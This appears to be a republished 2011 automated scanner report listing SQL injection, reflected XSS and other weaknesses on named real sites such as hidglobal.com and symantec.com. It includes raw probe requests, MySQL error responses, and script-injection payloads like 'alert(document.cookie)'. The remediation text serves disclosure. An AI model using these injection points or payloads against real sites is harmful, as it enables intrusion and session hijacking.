XSS, SQL Injection, HTTP Injection, DORK Report 2-14-2011, Unforgivable Vulnerabilities

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 13:59:42 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]

1.2. http://www.hidglobal.com/page.php [name of an arbitrarily supplied request parameter]

1.3. http://www.hidglobal.com/page.php [page_id parameter]

2. Cross-site scripting (reflected)

2.1. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

2.2. http://ad.media6degrees.com/adserv/cs [tId parameter]

2.3. https://www-secure.symantec.com/connect/symantec_symaccount [REST URL parameter 2]

2.4. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]

2.5. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]

2.6. http://www.hidglobal.com/page.php [name of an arbitrarily supplied request parameter]

2.7. http://www.hidglobal.com/page.php [name of an arbitrarily supplied request parameter]

2.8. http://www.hidglobal.com/page.php [page_id parameter]

2.9. http://www.hidglobal.com/page.php [page_id parameter]

2.10. http://www.securitynewsdaily.com/favicon.ico [REST URL parameter 1]

2.11. http://www.securitynewsdaily.com/media/system/twittertweeter.php [REST URL parameter 1]

2.12. http://www.securitynewsdaily.com/media/system/twittertweeter.php [REST URL parameter 2]

2.13. http://www.securitynewsdaily.com/media/system/twittertweeter.php [REST URL parameter 3]

2.14. http://www.securitynewsdaily.com/media/system/twittertweeter.php [url parameter]

2.15. http://www.securitynewsdaily.com/templates/security_news_daily/images/favicon.ico [REST URL parameter 4]

2.16. http://www.securitynewsdaily.com/tools/ [REST URL parameter 1]

2.17. http://www.symantec.com/connect/ [name of an arbitrarily supplied request parameter]

2.18. http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available [REST URL parameter 2]

2.19. http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available [REST URL parameter 3]

2.20. http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available [name of an arbitrarily supplied request parameter]

2.21. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]

2.22. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]

2.23. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]

2.24. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]

2.25. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]

2.26. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]

2.27. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 2]

2.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 3]

2.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 4]

2.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 5]

2.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 6]

2.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/shadow-menu-global.png [REST URL parameter 7]

2.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 2]

2.34. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 3]

2.35. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 4]

2.36. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 5]

2.37. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 6]

2.38. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 7]

2.39. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 2]

2.40. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 3]

2.41. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 4]

2.42. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 5]

2.43. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 6]

2.44. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 7]

2.45. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 2]

2.46. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 3]

2.47. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 4]

2.48. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 5]

2.49. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 6]

2.50. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 7]

2.51. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [name of an arbitrarily supplied request parameter]

2.52. http://www.hidglobal.com/onlineOrderStatusRegistration.php [Referer HTTP header]

3. Flash cross-domain policy

3.1. http://ajax.googleapis.com/crossdomain.xml

3.2. http://hidglobal.122.2o7.net/crossdomain.xml

3.3. http://metrics.hidglobal.com/crossdomain.xml

3.4. http://s3.amazonaws.com/crossdomain.xml

3.5. http://www.b2i.us/crossdomain.xml

3.6. https://www-secure.symantec.com/crossdomain.xml

3.7. http://www.businesswire.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://hidglobal.122.2o7.net/clientaccesspolicy.xml

4.2. http://metrics.hidglobal.com/clientaccesspolicy.xml

5. Cleartext submission of password

6. XML injection

6.1. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js [REST URL parameter 1]

6.2. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js [REST URL parameter 2]

6.3. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js [REST URL parameter 3]

6.4. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js [REST URL parameter 4]

6.5. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js [REST URL parameter 5]

7. SSL cookie without secure flag set

8. Session token in URL

8.1. https://symaccount.symantec.com/SymAccount/processLogin.do

8.2. http://www.securitynewsdaily.com/index.php

9. SSL certificate

9.1. https://orders.hidcorp.com/

9.2. https://symaccount.symantec.com/

9.3. https://www-secure.symantec.com/

10. Cookie scoped to parent domain

10.1. http://www.bericotechnologies.com/

10.2. http://ad.media6degrees.com/adserv/cs

10.3. http://b.scorecardresearch.com/b

10.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.5. http://id.google.com/verify/EAAAAECooqCHV7UqXTtcjqtOtZg.gif

10.6. http://metrics.hidglobal.com/b/ss/hidprod/1/H.19.4/s85479820847976

10.7. http://om.symantec.com/b/ss/veritasnonconsumer,veritasconnect/1/H.22.1/s81967138894833

11. Cookie without HttpOnly flag set

11.1. https://support.palantir.com/pg/

11.2. https://symaccount.symantec.com/SymAccount/index.jsp

11.3. http://www.b2i.us/irpass.asp

11.4. http://www.bericotechnologies.com/

11.5. http://www.businesswire.com/portal/site/home/membership/

11.6. http://www.hidglobal.com/lightbox_page.php

11.7. http://www.hidglobal.com/page.php

11.8. http://www.hidglobal.com/pressrelease.css

11.9. http://www.webcastir.com/SlideShowView.asp

11.10. http://ad.media6degrees.com/adserv/cs

11.11. http://b.scorecardresearch.com/b

11.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.13. http://hidglobal.122.2o7.net/b/ss/hidprod/1/H.21/s88918623856734

11.14. http://metrics.hidglobal.com/b/ss/hidprod/1/H.19.4/s85479820847976

11.15. http://om.symantec.com/b/ss/veritasnonconsumer,veritasconnect/1/H.22.1/s81967138894833

11.16. http://www.b2i.us/blank.htm

11.17. http://www.b2i.us/profiles/images/directory_minus.gif

11.18. http://www.b2i.us/profiles/images/directory_plus.gif

11.19. http://www.b2i.us/profiles/images/redx.jpg

11.20. http://www.b2i.us/profiles/images/reload.gif

11.21. http://www.b2i.us/profiles/images/speaker.gif

11.22. http://www.b2i.us/profiles/inc/BotDetectScript.js

11.23. http://www.b2i.us/profiles/inc/FormStyle.css

11.24. http://www.b2i.us/profiles/inc/InvCSS.asp

11.25. http://www.b2i.us/profiles/inc/dom-drag.js

11.26. http://www.b2i.us/profiles/inc/style.css

11.27. http://www.b2i.us/profiles/investor/LanapBotDetectHandler.asp

11.28. http://www.b2i.us/profiles/investor/contactus.asp

11.29. http://www.b2i.us/profiles/investor/fullpage.asp

11.30. http://www.securitynewsdaily.com/

11.31. http://www.webcastir.com/favicon.ico

12. Password field with autocomplete enabled

12.1. https://support.palantir.com/pg/login.do

12.2. https://symaccount.symantec.com/SymAccount/index.jsp

12.3. http://www.hidglobal.com/onlineOrderStatusRegistration.php

13. Referer-dependent response

14. Cross-domain POST

15. Cross-domain Referer leakage

15.1. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8

15.2. http://ad.media6degrees.com/adserv/cs

15.3. http://googleads.g.doubleclick.net/pagead/ads

15.4. http://googleads.g.doubleclick.net/pagead/ads

15.5. http://googleads.g.doubleclick.net/pagead/ads

15.6. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

15.7. http://www.b2i.us/profiles/investor/contactus.asp

15.8. http://www.b2i.us/profiles/investor/fullpage.asp

15.9. http://www.facebook.com/plugins/like.php

15.10. http://www.google.com/search

15.11. http://www.hidglobal.com/page.php

15.12. http://www.palantirtech.com/disclaimer.php

15.13. http://www.securitynewsdaily.com/index.php

15.14. http://www.securitynewsdaily.com/index.php

15.15. http://www.securitynewsdaily.com/media/system/twittertweeter.php

15.16. http://www.webcastir.com/SlideShowView.asp

16. Cross-domain script include

16.1. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8

16.2. http://googleads.g.doubleclick.net/pagead/ads

16.3. https://support.palantir.com/pg/login.do

16.4. http://www.facebook.com/plugins/like.php

16.5. http://www.hidglobal.com/

16.6. http://www.hidglobal.com/onlineOrderStatusRegistration.php

16.7. http://www.hidglobal.com/page.php

16.8. http://www.palantirtech.com/

16.9. http://www.palantirtech.com/about

16.10. http://www.securitynewsdaily.com/

16.11. http://www.securitynewsdaily.com/tools/

17. TRACE method is enabled

17.1. http://hidglobal.122.2o7.net/

17.2. http://metrics.hidglobal.com/

18. Email addresses disclosed

18.1. https://www-secure.symantec.com/connect/

18.2. https://www-secure.symantec.com/connect/sites/default/files/js/js_6e1ccd61cdbfbfb2c218c237cef494b0.js

18.3. http://www.bericotechnologies.com/berico-projects/coral-reef

18.4. http://www.bericotechnologies.com/sites/default/files/scripts/jquery.innerfade.js

18.5. http://www.bericotechnologies.com/sites/default/files/scripts/swfobject/swfIN.js

18.6. http://www.businesswire.com/js/calendar/lang/calendar-en.js

18.7. http://www.businesswire.com/js/calendar/src/calendar.js

18.8. http://www.hidglobal.com/javascript/jquery.pngFix.js

18.9. http://www.hidglobal.com/javascript/s_code.js

18.10. http://www.hidglobal.com/lightbox_page.php

18.11. http://www.hidglobal.com/lightbox_page.php

18.12. http://www.hidglobal.com/lightbox_page.php

18.13. http://www.hidglobal.com/onlineOrderStatusRegistration.php

18.14. http://www.hidglobal.com/wordpress/wp-content/themes/HID/js/pngfix.js

18.15. http://www.symantec.com/connect/

18.16. http://www.symantec.com/connect/sites/default/files/js/js_ce1ab1011cf68c3127d928b4413d3407.js

19. Private IP addresses disclosed

20. Robots.txt file

20.1. http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js

20.2. http://clients1.google.com/complete/search

20.3. http://hidglobal.122.2o7.net/b/ss/hidprod/1/H.21/s88918623856734

20.4. http://metrics.hidglobal.com/b/ss/hidprod/1/H.19.4/s85479820847976

20.5. http://safebrowsing.clients.google.com/safebrowsing/downloads

20.6. http://toolbarqueries.clients.google.com/tbproxy/af/query

20.7. https://www-secure.symantec.com/connect/symantec_symaccount

20.8. http://www.b2i.us/blank.htm

20.9. http://www.businesswire.com/portal/site/home/membership/

20.10. http://www.google-analytics.com/__utm.gif

20.11. http://www.hidglobal.com/

20.12. http://www.webcastir.com/SlideShowView.asp

21. Cacheable HTTPS response

21.1. https://support.palantir.com/

21.2. https://support.palantir.com/pg/login.do

21.3. https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico

22. HTML does not specify charset

22.1. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8

22.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

22.3. http://www.b2i.us/blank.htm

22.4. http://www.b2i.us/profiles/investor/contactus.asp

22.5. http://www.b2i.us/profiles/investor/fullpage.asp

22.6. http://www.bericotechnologies.com/opportunities/dc-metro

22.7. http://www.bericotechnologies.com/sites/all/themes/berico/images/news_bg.png

22.8. http://www.mygovernancewebsite.com/

22.9. http://www.mygovernancewebsite.com/requestinfo.htm

22.10. http://www.webcastir.com/SlideShowView.asp

22.11. http://www.webcastir.com/favicon.ico

23. Content type incorrectly stated

23.1. http://api.toptenreviews.com/r/c/request.php

23.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

23.3. https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico

23.4. http://www.bericotechnologies.com/opportunities/dc-metro

23.5. http://www.bericotechnologies.com/sites/all/themes/berico/images/news_bg.png

23.6. http://www.hidglobal.com/favicon.ico

23.7. http://www.securitynewsdaily.com/templates/security_news_daily/images/favicon.ico

23.8. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /onlineOrderStatusRegistration.php?1'=1 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=kr9b485jm7dv1f9g8un99oala4; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26ACBA4A851D330C-6000012840002166[CE]

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:30:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
</script>

       You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''
       LIMIT
       0,1' at line 6

Request 2

GET /onlineOrderStatusRegistration.php?1''=1 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=kr9b485jm7dv1f9g8un99oala4; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26ACBA4A851D330C-6000012840002166[CE]

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:30:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...

1.2. http://www.hidglobal.com/page.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /page.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /page.php?page_id=223&1'=1 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=cfjmn8vtu0cmn1oi7iger0jp04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21882


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
</script>

       You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''
       LIMIT
       0,1' at line 6

Request 2

GET /page.php?page_id=223&1''=1 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=tg0873033tauklk9gpsb9ch9a5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...

1.3. http://www.hidglobal.com/page.php [page_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /page.php

Issue detail

The page_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the page_id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /page.php?page_id=223' HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=mmvj5cve5qhq8i7ov5e41rbg30; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
</script>

       You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/page.php?page_id=223''
       LIMIT
       0,1' at line 6

Request 2

GET /page.php?page_id=223'' HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=tbn39g53q91sf7q5ourk4cg5l3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 52 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e42"><script>alert(1)</script>0b1202652d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

